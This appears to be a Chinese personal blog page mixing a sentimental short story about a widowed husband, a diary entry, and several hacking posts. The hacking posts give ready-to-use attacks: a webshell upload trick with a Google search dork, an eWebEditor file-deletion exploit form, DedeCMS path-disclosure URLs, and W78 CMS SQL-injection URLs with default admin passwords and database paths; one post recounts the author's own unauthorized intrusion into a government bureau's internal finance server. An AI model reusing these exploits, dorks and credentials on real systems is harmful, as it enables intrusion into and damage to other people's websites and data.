24岁女人和30岁男人在情侣包厢里的对话~~~

晚餐。桌两边,坐了男人和女人。
 
“我喜欢你。”女人一边摆弄着手里的酒杯,一边淡淡地说着。
 
“我有老婆。”男人摸着自己手上的戒指。

“我不在乎,我只想知道,你的感觉。你,喜欢我吗?”
 
男人抬起头,打量着对面的女人。
 
24岁,年轻,有朝气,相当不错的年纪。

 白皙的皮肤,充满活力的身体,一双明亮的,会说话的眼睛。

 真是不错的女孩啊,可惜。

 “如果你也喜欢我,我不介意作你的情人。”女人终于等不下去,追加了一句。

 “我爱我妻子。”男人坚定地回答。

 “你爱她?爱她什么?现在的她,应该已经年老色衰,见不得人了吧。否则,公司的晚宴,怎么从来不见你带她来……”

 女人还想继续,可接触到男人冷冷的目光后,打消了念头。

 静……

 “你喜欢我什么?”男人开口了。

“成熟,稳重,动作举止很有男人味,懂得关心人,很多很多。反正,和我之前见过的人不同,你很特别。”

 “你知道三年前的我什么样子?”男人点了颗烟。

 “不知道。我不在乎,即使你坐过牢。”
 
“三年前,我就是你现在眼里的那些普通男人。”男人没理会女人,继续说。

 “普通大学毕业,工作不顺心,整天喝酒,发脾气。对女孩子爱理不理,还因为去夜总会找小姐,被pol.ice抓过。”

 “那怎么……”女人有了兴趣,想知道是什么让男人转变的。

 “因为她?”

 “嗯。”

 “她那个人,好像总能看到事情的内在。教我很多东西,让我别太计较得失,别太在乎眼前的事,尽量待人和善。那时的我在她面前,就像少不更事的孩子。那时真的很奇怪,倔脾气的我,偏偏最听她的话。按照她说的,接受现实,我知道自己没用,就努力工作。那年年底,工作上稍微有了起色,我们结婚了。”
 
男人弹了弹烟灰,继续说着。

 “那时,真是苦日子。两个人,一张床,家里的家具也少得可怜。知道吗?结婚一年后,我才给她买了第一枚钻戒,存了大半年的钱呢。当然,是背着她存的。若她知道了,是肯定不让的。”

 “那阵子,因为烟酒弄得自己身体不好。大冬天的,她每天晚上睡前还要给我熬汤喝。那味道,也只有她做得出。”

男人沉醉于回忆里,忘记了时间,只是不停地讲述着往事。

而女人,也丝毫没有打断的意思,静静地听着。

等男人注意到时间,已经晚上10点了。

“啊,对不起,没注意时间,已经这么晚了。”男人抱歉地笑了笑。

“现在,你可以理解嘛?我不可能,也不会,做对不起她的事。”

 “啊,知道了。输给这样子的人,心服口服了!”女人无奈地摇了摇头。“不过我到了她的年纪,会更棒的。”
 
“嗯。那就可以找到更好的男人。不是吗?”
 “很晚了,家里的汤要冷了,我送你回去。”男人站起身,想送女人。
 “不了,我自己回去可以了。”女人摆了摆手。“回去吧,别让她等急了。”
 男人会心地笑了笑,转身要走。
 “她漂亮嘛?”
 “……嗯,很美。”
 男人的身影消失在夜色中,留下女人,对着蜡烛,发呆。
 男人回到家,推开门,径直走进卧室,打开了台灯。
 沿着床边,他坐了下来。

“老婆,已经第四个了。干嘛让我变得这么好,好多人喜欢我呀。搞不好,我会变心呀。干吗把我变得这么好,自己却先走了?我,我一个人,好孤单呀……”
男人哽咽地说着,终于泣不成声。

眼泪,一滴滴从男人的脸颊流下,打在手心里的相框上。昏暗的灯光中,旧照片里弥漫着的是已逝女子淡淡的温柔。

九天自助建站系统 0day

关键字:
inurl:/reg_TemletSel.asp?step=2
或者
电子商务自助建站–您理想的助手

利用方法:
1)注册
2)网站管理—资源管理—上传X.asp;x.jpg
3)拿到webshell

特殊情况:
1)强制改名
2)iis解析漏洞被修补,不能解析X.asp;x.jpg

坐在后排的太杯具了…

自己的梦想和现实

         已经是春天的今天居然下起了小雪。在外漂泊的这几年什么都没有混出来。又狼狈的回到了自己出生的地方。和小时候自己的理想已经发生巨大的偏差。从小自己就想着长大以后一定要做一个世俗人。根本从没有为了自己的衣食发愁。也从来没有考虑到这个方面。做为一个有着成为俗人的梦想从来就没想过自己长大了会为基本生活发愁。怀揣这坚定的信念加上没有能力的我,直接被现实打击体无完肤。我不甘心。我好不甘心。我就不相信自己不能够成为一个俗人。可是现在越来和自己的想法偏离了。3个月后真的进入国家单位为自己的后半生做了混日子的准备。到那个时候不知道我从小的信念和梦想是否依然存在。

注解:俗人是指有钱人

一个conn.asp脚本木马给我带来的灾难

几天前拿到xx省xx市的到矿物局站点.当要进一步扩大战果的时候在内部网络发现他们存在内部站点。没费多少工夫留到一个简单的上传shell后门到他们内部网络。准备以后随时渗透内部网络.然后退出.开始分析网络内部结构.最后搞明白.原来是国内中型企业b类ip. 划分比较细致.每个局都存在vlan.规模比较大.ip段也比较多.在分析出原来我留后门的内部服务器是他们其中的一个数据服务器.经分析貌似是企业几万人的财务数据服务器。<我上去也证实了着一点>吓死偶了.如果服务器出问题了。那我肯定玩完.没敢在进行下一步的动作.就此停止了渗透工作.经过几天的思想斗争.既然都进来了.还是在上去看一下.终于忍耐不住动手了.连接到内部网络.找到内部站点留下的小shell 准备传一个大马上去.当时因为在别人机器上就匆匆的在t00ls里找到了一个大马<地址:http://www.t00ls.net/thread-5364-1-2.html>就没太在心下下来.直接上传.因为此大马名称居然是一般站点的数据库连接配置文件.conn.asp 我就传上去了.一传上去.出现问题了.内部站点立刻开不开了.自己惊了.肯定是覆盖了人家的数据库连接文件.自己真没想到这么倒霉.立刻从新写了数据连接配置文件传上去.结果站点已经开不开.我在怎么修改都是站点处于维护中… 完了.此时我心沉入谷底一样的担心.这样很容易被管理员发现的.如果被管理员发现我是否就玩完了.苍茫中.我收拾战局立刻走人…… 然后就是整天心神不定的。指不定那一下人家警察就来找上我了……..哎… 怪自己懒了一下没有从新修改名字.当时自己已经知道文件名是conn 可是还是因为自己懒的原因差点让自己玩完…..至此我也停止了继续扩大战果的想法.已经停止了一切对人家安全检测的想法….所有写了这片文章给自己提一个醒.以后要处处小心…..

Ewebeditor2.8.0最终版删除任意文件漏洞

来源:http://www.oldjun.com/blog/index.php/archives/40/

这个漏洞可以很鸡肋,也可以很致命,关键看你怎么利用!

此漏洞存在于Example\NewsSystem目录下的delete.asp文件中,这是ewebeditor的测试页面,无须登陆可以直接进入,看这些代码:

‘ 把带”|”的字符串转为数组
Dim aSavePathFileName
aSavePathFileName = Split(sSavePathFileName, “|”)
‘ 删除新闻相关的文件,从文件夹中
Dim i
For i = 0 To UBound(aSavePathFileName)
‘ 按路径文件名删除文件
Call DoDelFile(aSavePathFileName(i))
Next

而aSavePathFileName是前面从数据库取出来的:

sSavePathFileName = oRs(“D_SavePathFileName”)

看看D_SavePathFileName是怎么添加到数据库里的,在addsave.asp(modifysave.asp)里:

sSavePathFileName = GetSafeStr(Request.Form(“d_savepathfilename”))
oRs(“D_SavePathFileName”) = sSavePathFileName

居然过滤了,是GetSafeStr函数,再看看这个函数,在Startup.asp里:

Function GetSafeStr(str)
GetSafeStr = Replace(Replace(Replace(Trim(str), “‘”, “”), Chr(34), “”), “;”, “”)
End Function

无语,这不是过滤字符型注入的函数么?放这里什么用也没有啊!既然路径没有过滤,那就可以直接定义了,构造一个提交页面,其中d_savepathfilename自己任意赋值(要删除多个文件,用|隔开即可)。试试../../eWebEditor.asp,提交后删除该新闻,于是主目录下的eWebEditor.asp不见了!

下面给出利用的htm:

  1. <HTML><HEAD><TITLE>eWebEditor删除文件 by:oldjun([url]http://www.oldjun.com[/url])</TITLE>
  2. <style>body,p,td,input {font-size:9pt}</style>
  3. </HEAD><BODY><a href=’list.asp’>新闻列表</a> | <a href=’add.asp’>增加新闻</a>
  4. <b>增加新闻</b>
  5. <form action=”http://127.0.0.1/editor/Example/NewsSystem/addsave.asp”
  6. method=”post” name=”myform”>
  7.     <input type=hidden name=d_originalfilename>
  8.     <input type=hidden name=d_savefilename>
  9.     <table cellspacing=3 align=center>
  10. <tr><td>要删的文件(相对路径就可以了):</td>
  11. <td><input type=”text” name=”d_savepathfilename” value=”" size=”90″></td>
  12. </tr>
  13. <tr><td>新闻标题(随便填):</td>
  14. <td><input type=”text” name=”d_title” value=”" size=”90″></td>
  15. </tr>
  16. <tr><td>标题图片:</td>
  17. <td><select name=”d_picture” size=1><option value=”>无</option></select>
  18. 当编辑区有插入图片时,将自动填充此下拉框</td>
  19. </tr>
  20. <tr><td>新闻内容(随便填):</td>
  21. <td><textarea name=”d_content”></textarea></td>
  22. </tr>
  23. </table>
  24. <input type=submit name=btnSubmit value=” 提 交 “>
  25. <input type=reset name=btnReset value=” 重 填 “>
  26. </form>
  27. </BODY></HTML>

清凉网站后台扫描工具V2.0 新增自定义字典导入功能

下载地址:scanweb

DEDECMS5.5暴路径漏洞

www.xxx.cn/plus/task/dede-upcache.php

在网站后面加上plus/task/dede-upcache.php
就能暴出网站路径但是没什么利用价值。
plus/paycenter/nps/config_pay_nps.php
plus/task/dede-optimize-table.php
plus/task/dede-maketimehtml.php

官方也存在这样的漏洞速度去暴暴

W78企业ASP网站管理系统V1.1的SQL注入

W78企业ASP网站管理系统V1.1的SQL注入

裸奔的系统。
1.shopmore.asp

set rs=server.createobject(“adodb.recordset”)
exec=”select * from [shop] where ssfl=”& request.QueryString(“id”) &” order by id desc ”
rs.open exec,conn,1,1
if rs.eof then
response.Write ” 该分类暂无产品!”
else
rs.PageSize =20 ‘每页记录条数
iCount=rs.RecordCount ‘记录总数
iPageSize=rs.PageSize
maxpage=rs.PageCount
page=request(“page”)
if Not IsNumeric(page) or page=”" then
page=1
2.about.asp

exec=”select * from [about] where id=”& request.QueryString(“id”)
set rs=server.createobject(“adodb.recordset”)
rs.open exec,conn,1,1

3.search_news.asp

dim title
title=request.form(“form_news”)
set rs=conn.execute(“select * from [news] where title like ‘%”&title&”%’”)
if title=”" then
response.write (“<script language=”"javascript”">alert(“”请输入关键字!”");history.go(-1);</script>”)
end if
if rs.eof then
response.write (“<script language=”"javascript”">alert(“”没有搜索到相关内容!”");history.go(-1);</script>”)

还有其他的页面。

4.此系统的在线编辑登录页面为admin/eWebEditor/admin/login.asp
默认user:admin password:198625
不能进的还可以试试

后台默认密码为admin11 86779533 abc123这三个

试试数据库默认地址为/data/%23sze7xiaohu.mdb

exp:http://www.xx.com/about.a … 0union%20select%201,admin,3,password,5,6%20from%20admin

http://www.xx.com/ShopMor … 0union%20select%201,2,admin%2bpassword,4,5,6,7,8,9%20from%20admin

搜索型注入:%’ and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where ‘%’=’

Google:inurl:ShopMore.asp?id

感谢我兄弟送我空间

感谢兄弟:♡C:\湯勇愛你   赞助我的空间.空间速度快.确实不错…

如果还有别的兄弟需要购买国外的空间可以找我.速度我的这个就是例子!